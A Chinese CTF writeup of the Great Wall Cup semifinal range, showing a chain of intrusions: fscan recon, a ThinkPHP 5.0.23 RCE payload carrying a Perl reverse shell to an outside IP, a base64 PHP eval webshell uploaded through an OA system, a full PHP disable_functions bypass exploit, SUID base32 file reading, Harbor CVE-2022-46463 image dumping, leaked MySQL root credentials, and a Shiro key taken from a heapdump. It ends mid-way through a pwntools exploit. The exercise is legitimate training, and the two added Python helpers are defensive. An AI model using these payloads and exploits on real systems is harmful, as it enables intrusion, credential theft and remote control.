Great Wall Cup Semifinal - GreatWall
Attack path

Image taken from the Xianzhi community (iker)
First, use fscan to scan the target network:
┌──(root㉿kali-plus)-[~/fscan/Linux]
└─# ./fscan -h 8.130.146.145
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] 开始信息扫描...
[*] 最终有效主机数量: 1
[*] 共解析 218 个有效端口
[+] 端口开放 8.130.146.145:80
[+] 端口开放 8.130.146.145:22
[+] 端口开放 8.130.146.145:8080
[+] 存活端口数量: 3
[*] 开始漏洞扫描...
[*] 网站标题 http://8.130.146.145 状态码:200 长度:10887 标题:""
[*] 网站标题 http://8.130.146.145:8080 状态码:200 长度:1027 标题:Login Form
[+] [发现漏洞] 目标: http://8.130.146.145:8080
漏洞类型: poc-yaml-thinkphp5023-method-rce
漏洞名称: poc1
详细信息: %!s(<nil>)
[!] 扫描错误 8.130.146.145:22 - 扫描总时间超时: context deadline exceeded
[+] 扫描已完成: 3/3
[*] 扫描结束,耗时: 11.206446111s
ThinkPHP 5.0.23 RCE (flag01)
fscan reports the ThinkPHP 5.0.23 RCE, so grab an existing PoC and try it:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=perl -MIO -e '$p=fork;exit;if($p);$c=new IO::Socket::INET(PeerAddr,"156.238.233.21:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
That did not work, so I went straight to an all-in-one exploitation tool; once you have a shell, flag01 is right there.
cat /f1ag01_UdEv.txt
flag01: flag{176f49b6-147f-4557-99ec-ba0a351e1ada}
With this shell, upload fscan, find the host's internal IP, and scan the subnet with fscan:
(www-data:/var/www/html/background/public) $ ./fscan -h 172.28.23.1/24 >result
(www-data:/var/www/html/background/public) $ cat result
[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] 开始信息扫描...
[*] CIDR范围: 172.28.23.0-172.28.23.255
[*] 已生成IP范围: 172.28.23.0 - 172.28.23.255
[*] 已解析CIDR 172.28.23.1/24 -> IP范围 172.28.23.0-172.28.23.255
[*] 最终有效主机数量: 256
[-] 正在尝试无监听ICMP探测...
[-] 当前用户权限不足,无法发送ICMP包
[*] 切换为PING方式探测...
[+] 目标 172.28.23.26 存活 (ICMP)
[+] 目标 172.28.23.17 存活 (ICMP)
[+] 目标 172.28.23.33 存活 (ICMP)
[+] ICMP存活主机数量: 3
[*] 共解析 218 个有效端口
[+] 端口开放 172.28.23.26:80
[+] 端口开放 172.28.23.33:22
[+] 端口开放 172.28.23.17:80
[+] 端口开放 172.28.23.26:22
[+] 端口开放 172.28.23.26:21
[+] 端口开放 172.28.23.33:8080
[+] 端口开放 172.28.23.17:8080
[+] 端口开放 172.28.23.17:22
[+] 存活端口数量: 8
[*] 开始漏洞扫描...
[*] 网站标题 http://172.28.23.33:8080 状态码:302 长度:0 标题:无标题 重定向地址: http://172.28.23.33:8080/login;jsessionid=86D0E86A3F4AA49110E9F47446D39E0F
[*] 网站标题 http://172.28.23.17 状态码:200 长度:10887 标题:""
[*] 网站标题 http://172.28.23.26 状态码:200 长度:13693 标题:新翔OA管理系统-OA管理平台联系电话:13849422648微信同号,QQ958756413
[*] 网站标题 http://172.28.23.33:8080/login;jsessionid=86D0E86A3F4AA49110E9F47446D39E0F 状态码:200 长度:3860 标题:智联科技 ERP 后台登陆
[*] 网站标题 http://172.28.23.17:8080 状态码:200 长度:1027 标题:Login Form
[+] ftp 172.28.23.26:21:anonymous
[->]OASystem.zip
[+] [发现漏洞] 目标: http://172.28.23.17:8080
漏洞类型: poc-yaml-thinkphp5023-method-rce
漏洞名称: poc1
详细信息: %!s(<nil>)
[+] [发现漏洞] 目标: http://172.28.23.33:8080
漏洞类型: poc-yaml-spring-actuator-heapdump-file
漏洞名称:
详细信息: %!s(<nil>)
[+] [发现漏洞] 目标: http://172.28.23.33:8080
漏洞类型: poc-yaml-springboot-env-unauth
漏洞名称: spring2
详细信息: %!s(<nil>)
[!] 扫描错误 172.28.23.17:22 - 扫描总时间超时: context deadline exceeded
[!] 扫描错误 172.28.23.33:22 - 扫描总时间超时: context deadline exceeded
[!] 扫描错误 172.28.23.26:22 - 扫描总时间超时: context deadline exceeded
[+] 扫描已完成: 8/8
[*] 扫描结束,耗时: 12.11975967s
The scan finds a Xinxiang OA management system and an ERP back-end management system. Next, set up a proxy.
Setting up the proxy
Use Stowaway:
# on the VPS
./linux_x64_admin -l 6666
# on the target
./linux_x64_agent -c <ip>:<port>
# on the VPS
use 0
socks 15000
Then connect through it with Proxifier or proxychains4.
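To triage output like the two fscan runs above without reading it line by line, here is an added Python helper (not part of the writeup or of fscan) that folds the lines into a per-host summary and flags hosts worth a closer look. It handles both the 2.0.0 "[+]" layout shown here and the timestamped layout of the later scan on this page; the sample lines and the watch-list of ports are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample mixing the two fscan layouts seen in this writeup:
# the 2.0.0 "[+] ..." lines and the later "[timestamp] [LEVEL] ..." lines.
SAMPLE = """\
[+] 端口开放 172.28.23.26:80
[+] 端口开放 172.28.23.33:8080
[*] 网站标题 http://172.28.23.33:8080/login 状态码:200 长度:3860 标题:智联科技 ERP 后台登陆
[+] ftp 172.28.23.26:21:anonymous
[->]OASystem.zip
[+] [发现漏洞] 目标: http://172.28.23.33:8080
漏洞类型: poc-yaml-springboot-env-unauth
漏洞名称: spring2
详细信息: %!s(<nil>)
[2025-04-10 21:35:08] [SUCCESS] 端口开放 172.22.14.37:10250
[2025-04-10 21:35:19] [SUCCESS] 网站标题 http://172.22.14.46 状态码:200 长度:785 标题:Harbor
[2025-04-10 21:35:20] [SUCCESS] 检测到漏洞 http://172.22.14.46:80/swagger.json poc-yaml-swagger-ui-unauth 参数:[{path swagger.json}]
"""

# Strip "[+] " / "[*] " or "[2025-04-10 21:35:08] [SUCCESS] " so both layouts share one grammar.
PREFIX = re.compile(r"^(?:\[[\d: -]+\] )?\[[^\]]+\] ")
PORT_RE = re.compile(r"^端口开放 (\S+):(\d+)$")
TITLE_RE = re.compile(r"^网站标题 (\S+) 状态码:(\d+) .*?标题:(.*)$")
FTP_RE = re.compile(r"^ftp (\S+):\d+:anonymous$")
VULN_V1 = re.compile(r"^\[发现漏洞\] 目标: (\S+)$")   # followed by a "漏洞类型: ..." line
VULN_V2 = re.compile(r"^检测到漏洞 (\S+) (\S+)")       # one-line form of the newer build

def host_of(url):
    return urlsplit(url).hostname or url

def parse_fscan(text):
    """Fold fscan output into {host: {"ports": set, "web": {url: (status, title)}, "findings": [...]}}."""
    hosts = defaultdict(lambda: {"ports": set(), "web": {}, "findings": []})
    pending = None  # host whose multi-line "[发现漏洞]" block is being read
    for raw in text.splitlines():
        line = PREFIX.sub("", raw.strip(), count=1)
        if pending and line.startswith("漏洞类型: "):
            hosts[pending]["findings"].append(line.split(": ", 1)[1])
            continue
        pending = None
        if m := PORT_RE.match(line):
            hosts[m[1]]["ports"].add(int(m[2]))
        elif m := TITLE_RE.match(line):
            hosts[host_of(m[1])]["web"][m[1]] = (int(m[2]), m[3])
        elif m := FTP_RE.match(line):
            hosts[m[1]]["findings"].append("ftp-anonymous-login")
        elif m := VULN_V1.match(line):
            pending = host_of(m[1])
        elif m := VULN_V2.match(line):
            hosts[host_of(m[1])]["findings"].append(m[2])
    return dict(hosts)

# Ports whose mere exposure deserves a look even without a PoC hit (constructed list for this example).
WATCH_PORTS = {21: "ftp", 2379: "etcd", 3306: "mysql", 6443: "kube-apiserver", 10250: "kubelet"}

def triage(report):
    """Return [(host, reasons)] for hosts with a finding or a watch-listed port, most reasons first."""
    out = []
    for host, info in report.items():
        reasons = list(info["findings"])
        reasons += [f"port {p} ({WATCH_PORTS[p]}) open" for p in sorted(info["ports"]) if p in WATCH_PORTS]
        if reasons:
            out.append((host, reasons))
    return sorted(out, key=lambda hr: -len(hr[1]))

if __name__ == "__main__":
    for host, reasons in triage(parse_fscan(SAMPLE)):
        print(host, "->", "; ".join(reasons))
```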
FTP anonymous login, source audit, file upload (flag02)
After logging into FTP anonymously, the OASystem source is there. Download it, audit the code, find the upload vulnerability and exploit it with imgbase64=data:image/php;base64,PD9waHAgcGhwaW5mbygpOyBAZXZhbCgkX1BPU1RbJ3NoZWxsJ10pOyA/Pg==
That gives a shell on this box, but disable_functions is set and has to be bypassed; a plugin can do it, but the plugin does not work well.
I found the writeup by ta0, which uses this script: https://github.com/mm0r1/exploits/blob/master/php-filter-bypass/exploit.php
<?php
# PHP 7.0-8.0 disable_functions bypass PoC (*nix only)
#
# Bug: https://bugs.php.net/bug.php?id=54350
#
# This exploit should work on all PHP 7.0-8.0 versions
# released as of 2021-10-06
#
# Author: https://github.com/mm0r1

pwn('chmod +x linux_x64_agent;./linux_x64_agent -c 172.28.23.17:9999');

function pwn($cmd) {
    define('LOGGING', false);
    define('CHUNK_DATA_SIZE', 0x60);
    define('CHUNK_SIZE', ZEND_DEBUG_BUILD ? CHUNK_DATA_SIZE + 0x20 : CHUNK_DATA_SIZE);
    define('FILTER_SIZE', ZEND_DEBUG_BUILD ? 0x70 : 0x50);
    define('STRING_SIZE', CHUNK_DATA_SIZE - 0x18 - 1);
    define('CMD', $cmd);

    for($i = 0; $i < 10; $i++) {
        $groom[] = Pwn::alloc(STRING_SIZE);
    }

    stream_filter_register('pwn_filter', 'Pwn');
    $fd = fopen('php://memory', 'w');
    stream_filter_append($fd, 'pwn_filter');
    fwrite($fd, 'x');
}

class Helper { public $a, $b, $c; }

class Pwn extends php_user_filter {
    private $abc, $abc_addr;
    private $helper, $helper_addr, $helper_off;
    private $uafp, $hfp;

    public function filter($in, $out, &$consumed, $closing) {
        if($closing) return;
        stream_bucket_make_writeable($in);
        $this->filtername = Pwn::alloc(STRING_SIZE);
        fclose($this->stream);
        $this->go();
        return PSFS_PASS_ON;
    }

    private function go() {
        $this->abc = &$this->filtername;
        $this->make_uaf_obj();
        $this->helper = new Helper;
        $this->helper->b = function($x) {};

        $this->helper_addr = $this->str2ptr(CHUNK_SIZE * 2 - 0x18) - CHUNK_SIZE * 2;
        $this->log("helper @ 0x%x", $this->helper_addr);

        $this->abc_addr = $this->helper_addr - CHUNK_SIZE;
        $this->log("abc @ 0x%x", $this->abc_addr);

        $this->helper_off = $this->helper_addr - $this->abc_addr - 0x18;
        $helper_handlers = $this->str2ptr(CHUNK_SIZE);
        $this->log("helper handlers @ 0x%x", $helper_handlers);

        $this->prepare_leaker();

        $binary_leak = $this->read($helper_handlers + 8);
        $this->log("binary leak @ 0x%x", $binary_leak);

        $this->prepare_cleanup($binary_leak);

        $closure_addr = $this->str2ptr($this->helper_off + 0x38);
        $this->log("real closure @ 0x%x", $closure_addr);

        $closure_ce = $this->read($closure_addr + 0x10);
        $this->log("closure class_entry @ 0x%x", $closure_ce);

        $basic_funcs = $this->get_basic_funcs($closure_ce);
        $this->log("basic_functions @ 0x%x", $basic_funcs);

        $zif_system = $this->get_system($basic_funcs);
        $this->log("zif_system @ 0x%x", $zif_system);

        $fake_closure_off = $this->helper_off + CHUNK_SIZE * 2;
        for($i = 0; $i < 0x138; $i += 8) {
            $this->write($fake_closure_off + $i, $this->read($closure_addr + $i));
        }
        $this->write($fake_closure_off + 0x38, 1, 4);
        $handler_offset = PHP_MAJOR_VERSION === 8 ? 0x70 : 0x68;
        $this->write($fake_closure_off + $handler_offset, $zif_system);

        $fake_closure_addr = $this->helper_addr + $fake_closure_off - $this->helper_off;
        $this->write($this->helper_off + 0x38, $fake_closure_addr);
        $this->log("fake closure @ 0x%x", $fake_closure_addr);

        $this->cleanup();

        ($this->helper->b)(CMD);
    }

    private function make_uaf_obj() {
        $this->uafp = fopen('php://memory', 'w');
        fwrite($this->uafp, pack('QQQ', 1, 0, 0xDEADBAADC0DE));
        for($i = 0; $i < STRING_SIZE; $i++) {
            fwrite($this->uafp, "\x00");
        }
    }

    private function prepare_leaker() {
        $str_off = $this->helper_off + CHUNK_SIZE + 8;
        $this->write($str_off, 2);
        $this->write($str_off + 0x10, 6);

        $val_off = $this->helper_off + 0x48;
        $this->write($val_off, $this->helper_addr + CHUNK_SIZE + 8);
        $this->write($val_off + 8, 0xA);
    }

    private function prepare_cleanup($binary_leak) {
        $ret_gadget = $binary_leak;
        do {
            --$ret_gadget;
        } while($this->read($ret_gadget, 1) !== 0xC3);
        $this->log("ret gadget = 0x%x", $ret_gadget);

        $this->write(0, $this->abc_addr + 0x20 - (PHP_MAJOR_VERSION === 8 ? 0x50 : 0x60));
        $this->write(8, $ret_gadget);
    }

    private function read($addr, $n = 8) {
        $this->write($this->helper_off + CHUNK_SIZE + 16, $addr - 0x10);
        $value = strlen($this->helper->c);
        if($n !== 8) { $value &= (1 << ($n << 3)) - 1; }
        return $value;
    }

    private function write($p, $v, $n = 8) {
        for($i = 0; $i < $n; $i++) {
            $this->abc[$p + $i] = chr($v & 0xff);
            $v >>= 8;
        }
    }

    private function get_basic_funcs($addr) {
        while(true) {
            // In rare instances the standard module might lie after the addr we're starting
            // the search from. This will result in a SIGSGV when the search reaches an unmapped page.
            // In that case, changing the direction of the search should fix the crash.
            // $addr += 0x10;
            $addr -= 0x10;
            if($this->read($addr, 4) === 0xA8 &&
                in_array($this->read($addr + 4, 4),
                    [20151012, 20160303, 20170718, 20180731, 20190902, 20200930])) {
                $module_name_addr = $this->read($addr + 0x20);
                $module_name = $this->read($module_name_addr);
                if($module_name === 0x647261646e617473) {
                    $this->log("standard module @ 0x%x", $addr);
                    return $this->read($addr + 0x28);
                }
            }
        }
    }

    private function get_system($basic_funcs) {
        $addr = $basic_funcs;
        do {
            $f_entry = $this->read($addr);
            $f_name = $this->read($f_entry, 6);
            if($f_name === 0x6d6574737973) {
                return $this->read($addr + 8);
            }
            $addr += 0x20;
        } while($f_entry !== 0);
    }

    private function cleanup() {
        $this->hfp = fopen('php://memory', 'w');
        fwrite($this->hfp, pack('QQ', 0, $this->abc_addr));
        for($i = 0; $i < FILTER_SIZE - 0x10; $i++) {
            fwrite($this->hfp, "\x00");
        }
    }

    private function str2ptr($p = 0, $n = 8) {
        $address = 0;
        for($j = $n - 1; $j >= 0; $j--) {
            $address <<= 8;
            $address |= ord($this->abc[$p + $j]);
        }
        return $address;
    }

    private function ptr2str($ptr, $n = 8) {
        $out = '';
        for ($i = 0; $i < $n; $i++) {
            $out .= chr($ptr & 0xff);
            $ptr >>= 8;
        }
        return $out;
    }

    private function log($format, $val = '') {
        if(LOGGING) {
            printf("{$format}\n", $val);
        }
    }

    static function alloc($size) {
        return str_shuffle(str_repeat('A', $size));
    }
}
?>
Second-level intranet proxy
Reuse the Stowaway instance started earlier.
(Image: Pasted image 20250410213849.png)
Using the script above, change the port number accordingly; requesting the file executes it and the Stowaway listener picks up the new agent. Go back in the admin console, select the newly connected node, and open another proxy:
back
use 1
socks 15001
To get a shell, just type shell in the Stowaway console. flag02.txt is in the root directory, but this user has no permission to read it, so look for SUID binaries:
find / -perm -4000 2>/dev/null
/bin/fusermount
/bin/ping6
/bin/mount
/bin/su
/bin/ping
/bin/umount
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/staprun
/usr/bin/base32
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/s-nail/s-nail-privsep
base32 flag02.txt | base32 -d
flag02: flag{56d37734-5f73-447f-b1a5-a83f45549b28}
Upload fscan and scan again; the results:
[2025-04-10 21:35:02] [INFO] 生成IP范围: 172.22.14.0.%!d(string=172.22.14.255) - %!s(MISSING).%!d(MISSING)
[2025-04-10 21:35:02] [INFO] 解析CIDR 172.22.14.0/24 -> IP范围 172.22.14.0-172.22.14.255
[2025-04-10 21:35:02] [INFO] 最终有效主机数量: 256
[2025-04-10 21:35:02] [INFO] 开始主机扫描
[2025-04-10 21:35:02] [INFO] 正在尝试无监听ICMP探测...
[2025-04-10 21:35:02] [INFO] 当前用户权限不足,无法发送ICMP包
[2025-04-10 21:35:02] [INFO] 切换为PING方式探测...
[2025-04-10 21:35:02] [SUCCESS] 目标 172.22.14.6 存活 (ICMP)
[2025-04-10 21:35:02] [SUCCESS] 目标 172.22.14.37 存活 (ICMP)
[2025-04-10 21:35:02] [SUCCESS] 目标 172.22.14.46 存活 (ICMP)
[2025-04-10 21:35:08] [INFO] 存活主机数量: 3
[2025-04-10 21:35:08] [INFO] 有效端口数量: 233
[2025-04-10 21:35:08] [SUCCESS] 端口开放 172.22.14.6:21
[2025-04-10 21:35:08] [SUCCESS] 端口开放 172.22.14.46:80
[2025-04-10 21:35:08] [SUCCESS] 端口开放 172.22.14.46:22
[2025-04-10 21:35:08] [SUCCESS] 端口开放 172.22.14.37:22
[2025-04-10 21:35:08] [SUCCESS] 端口开放 172.22.14.6:80
[2025-04-10 21:35:08] [SUCCESS] 端口开放 172.22.14.6:22
[2025-04-10 21:35:08] [SUCCESS] 端口开放 172.22.14.37:2379
[2025-04-10 21:35:08] [SUCCESS] 端口开放 172.22.14.37:10250
[2025-04-10 21:35:08] [SUCCESS] 服务识别 172.22.14.6:21 => [ftp] 版本:3.0.3 产品:vsftpd 系统:Unix Banner:[220 (vsFTPd 3.0.3).]
[2025-04-10 21:35:08] [SUCCESS] 服务识别 172.22.14.46:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.11 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.11.]
[2025-04-10 21:35:08] [SUCCESS] 服务识别 172.22.14.37:22 => [ssh] 版本:7.6p1 Ubuntu 4ubuntu0.7 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.7.]
[2025-04-10 21:35:08] [SUCCESS] 服务识别 172.22.14.6:22 => [ssh] 版本:7.2p2 Ubuntu 4ubuntu2.10 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10.]
[2025-04-10 21:35:13] [SUCCESS] 服务识别 172.22.14.46:80 => [http] 产品:nginx
[2025-04-10 21:35:14] [SUCCESS] 服务识别 172.22.14.37:2379 =>
[2025-04-10 21:35:14] [SUCCESS] 服务识别 172.22.14.6:80 => [http]
[2025-04-10 21:35:18] [SUCCESS] 服务识别 172.22.14.37:10250 =>
[2025-04-10 21:35:19] [INFO] 存活端口数量: 8
[2025-04-10 21:35:19] [INFO] 开始漏洞扫描
[2025-04-10 21:35:19] [INFO] 加载的插件: ftp, ssh, webpoc, webtitle
[2025-04-10 21:35:19] [SUCCESS] 网站标题 http://172.22.14.6 状态码:200 长度:13693 标题:新翔OA管理系统-OA管理平台联系电话:13849422648微信同号,QQ958756413
[2025-04-10 21:35:19] [SUCCESS] 网站标题 http://172.22.14.46 状态码:200 长度:785 标题:Harbor
[2025-04-10 21:35:19] [SUCCESS] 发现指纹 目标: http://172.22.14.46 指纹: [Harbor]
[2025-04-10 21:35:19] [SUCCESS] 匿名登录成功!
[2025-04-10 21:35:19] [SUCCESS] 网站标题 https://172.22.14.37:10250 状态码:404 长度:19 标题:无标题
[2025-04-10 21:35:20] [SUCCESS] 检测到漏洞 http://172.22.14.46:80/swagger.json poc-yaml-swagger-ui-unauth 参数:[{path swagger.json}]
Harbor CVE-2022-46463 (flag05)
There was no need for the second-level proxy just set up; it seems to chain directly, so with the first proxy 172.22.14.46 is reachable straight away. Then exploit CVE-2022-46463 using an existing PoC for CVE-2022-46463:
proxychains4 -q python harbor.py http://172.22.14.46/
proxychains4 -q python harbor.py http://172.22.14.46 --dump harbor/secret --v2
grep -r 'flag05'
┌──(root㉿kali-plus)-[~/gratewall]
└─# proxychains4 -q python harbor.py http://172.22.14.46/
[*] API version used v2.0
[+] project/projectadmin
[+] project/portal
[+] library/nginx
[+] library/redis
[+] harbor/secret
┌──(root㉿kali-plus)-[~/gratewall]
└─# proxychains4 -q python harbor.py http://172.22.14.46 --dump harbor/secret --v2
[+] Dumping : harbor/secret:latest
[+] Downloading:58690f9b18fca6469a14da4e212c96849469f9b1be6661d2342a4bf01774aa50
[+] Downloading:b51569e7c50720acf6860327847fe342a1afbe148d24c529fb81df105e3eed01
[+] Downloading:da8ef40b9ecabc2679fe2419957220c0272a965c5cf7e0269fa1aeeb8c56f2e1
[+] Downloading:fb15d46c38dcd1ea0b1990006c3366ecd10c79d374f341687eb2cb23a2c8672e
[+] Downloading:413e572f115e1674c52e629b3c53a42bf819f98c1dbffadc30bda0a8f39b0e49
[+] Downloading:8bd8c9755cbf83773a6a54eff25db438debc22d593699038341b939e73974653
┌──(root㉿kali-plus)-[~/gratewall]
└─# grep -r 'flag05'
caches/harbor_secret/latest/413e572f115e1674c52e629b3c53a42bf819f98c1dbffadc30bda0a8f39b0e49/f1ag05_Yz1o.txt:flag05: flag{8c89ccd3-029d-41c8-8b47-98fb2006f0cf}
This gives flag05: flag{8c89ccd3-029d-41c8-8b47-98fb2006f0cf}
UDF privilege escalation (flag06)
Next, dump another image:
┌──(root㉿kali-plus)-[~/gratewall]
└─# proxychains4 python3 harbor.py http://172.22.14.46 --dump project/projectadmin --v2
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 156.238.233.21:15001 ... 172.22.14.46:80 ... OK
[proxychains] Strict chain ... 156.238.233.21:15001 ... 172.22.14.46:80 ... OK
[+] Dumping : project/projectadmin:latest
[proxychains] Strict chain ... 156.238.233.21:15001 ... 172.22.14.46:80 ... OK
[proxychains] Strict chain ... 156.238.233.21:15001 ... 172.22.14.46:80 ... OK
[+] Downloading : 63e9bbe323274e77e58d77c6ab6802d247458f784222fbb07a2556d6ec74ee05
[proxychains] Strict chain ... 156.238.233.21:15001 ... 172.22.14.46:80 ... OK
[+] Downloading : a1ae0db7d6c6f577c8208ce5b780ad362ef36e69d068616ce9188ac1cc2f80c6
[proxychains] Strict chain ... 156.238.233.21:15001 ... 172.22.14.46:80 ... OK
[+] Downloading : 70437571d98143a3479eaf3cc5af696ea79710e815d16e561852cf7d429736bd
[proxychains] Strict chain ... 156.238.233.21:15001 ... 172.22.14.46:80 ... OK
[+] Downloading : ae0fa683fb6d89fd06e238876769e2c7897d86d7546a4877a2a4d2929ed56f2c
This yields a jar named ProjectAdmin-0.0.1-SNAPSHOT.jar, whose configuration contains:
spring.datasource.url=jdbc:mysql://172.22.10.28:3306/projectadmin?characterEncoding=utf-8&useUnicode=true&serverTimezone=UTC
spring.datasource.username=root
spring.datasource.password=My3q1i4oZkJm3
spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver
mybatis.type-aliases-package=com.smartlink.projectadmin.entity
mybatis.mapper-locations=classpath:mybatis/mapper/*.xml
It leaks the MySQL root password, so you can connect directly or use the MDUT tool.
(Image: Pasted image 20250416200509.png)
This gives flag06: flag{413ac6ad-1d50-47cb-9cf3-17354b751741}
One pitfall here: the enhanced MDUT bundled in the onefox toolbox could not connect, while the original version could. You can also do the UDF privilege escalation with msf; see ta0's blog.
Shiro + pwn (flag03)
http://172.28.23.33:8080/actuator/heapdump exposes a heap dump, and the dump contains the Shiro key:
CookieRememberMeManager(ShiroKey)
-------------
algMode = GCM, key = AZYyIgMYhG6/CzIJlvpR2g==, algName = AES
With the Shiro key, use a ready-made tool: detect the usable gadget chain, inject an in-memory shell, set up the proxy and connect.
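The heap dump was obtainable only because the Actuator heapdump endpoint was exposed over HTTP. Here is an added Python check (not from the writeup) that, given an application.properties, computes which Spring Boot 2.x Actuator endpoints are exposed and flags the sensitive ones; it assumes Boot's documented include/exclude rules with a default include of health (Boot 2.5+), and says nothing about whether Spring Security also guards them, which in this case it evidently did not.

```python
# Added example: evaluate Spring Boot 2.x Actuator web exposure from application.properties.
# Rules assumed (Boot's documented behaviour):
#   management.endpoints.web.exposure.include   default "health" (2.5+); "*" selects every endpoint
#   management.endpoints.web.exposure.exclude   takes precedence over include
#   management.endpoint.<id>.enabled            per-endpoint switch (shutdown is off by default)
#   management.endpoints.enabled-by-default     global switch
KNOWN_ENDPOINTS = {"health", "info", "env", "heapdump", "threaddump", "beans",
                   "mappings", "loggers", "metrics", "configprops", "shutdown"}
DEFAULT_DISABLED = {"shutdown"}
# Endpoints that leak secrets or allow control; heapdump is how the Shiro key above was recovered.
SENSITIVE = {"heapdump", "env", "threaddump", "beans", "mappings", "loggers", "configprops", "shutdown"}

def parse_properties(text):
    """Minimal key=value parser for .properties files (comments start with # or !)."""
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in "#!":
            continue
        key, _, value = line.partition("=")
        props[key.strip()] = value.strip()
    return props

def _csv(value):
    return {v.strip() for v in value.split(",") if v.strip()}

def _enabled(props, ep):
    flag = props.get(f"management.endpoint.{ep}.enabled")
    if flag is not None:
        return flag.lower() == "true"
    if ep in DEFAULT_DISABLED:
        return False
    return props.get("management.endpoints.enabled-by-default", "true").lower() == "true"

def exposed_endpoints(props):
    """Set of endpoint ids reachable over HTTP under the given properties."""
    enabled = {ep for ep in KNOWN_ENDPOINTS if _enabled(props, ep)}
    include = _csv(props.get("management.endpoints.web.exposure.include", "health"))
    exclude = _csv(props.get("management.endpoints.web.exposure.exclude", ""))
    if "*" in exclude:
        return set()
    selected = enabled if "*" in include else enabled & include
    return selected - exclude

def risky_exposures(props):
    return sorted(exposed_endpoints(props) & SENSITIVE)

# Constructed configs: the weak one reproduces what fscan flagged on 172.28.23.33
# (heapdump and env reachable); the hardened one keeps only health and info.
WEAK = """\
server.port=8080
management.endpoints.web.exposure.include=*
"""
HARDENED = """\
server.port=8080
management.endpoints.web.exposure.include=health,info
management.endpoints.web.exposure.exclude=heapdump,env
management.endpoint.heapdump.enabled=false
"""

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK), ("hardened", HARDENED)):
        props = parse_properties(cfg)
        print(label, "exposes", sorted(exposed_endpoints(props)), "risky:", risky_exposures(props))
```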
/ >ss -lntp
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 64 0.0.0.0:59696 0.0.0.0:*
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 100 *:8080 *:* users:(("java",pid=666,fd=27))
Port 59696 is listening. Connect to it through the proxy: it is a pwn challenge that I did not fully understand, so I used an exploit directly. The corresponding ELF is at /home/ops01/HashNote.
from pwn import *
context.arch='amd64'

def add(key,data='b'):
    p.sendlineafter(b'Option:',b'1')
    p.sendlineafter(b'Key:',key)
    p.sendlineafter(b'Data:',data)

def show(key):
    p.sendlineafter(b'Option:',b'2')
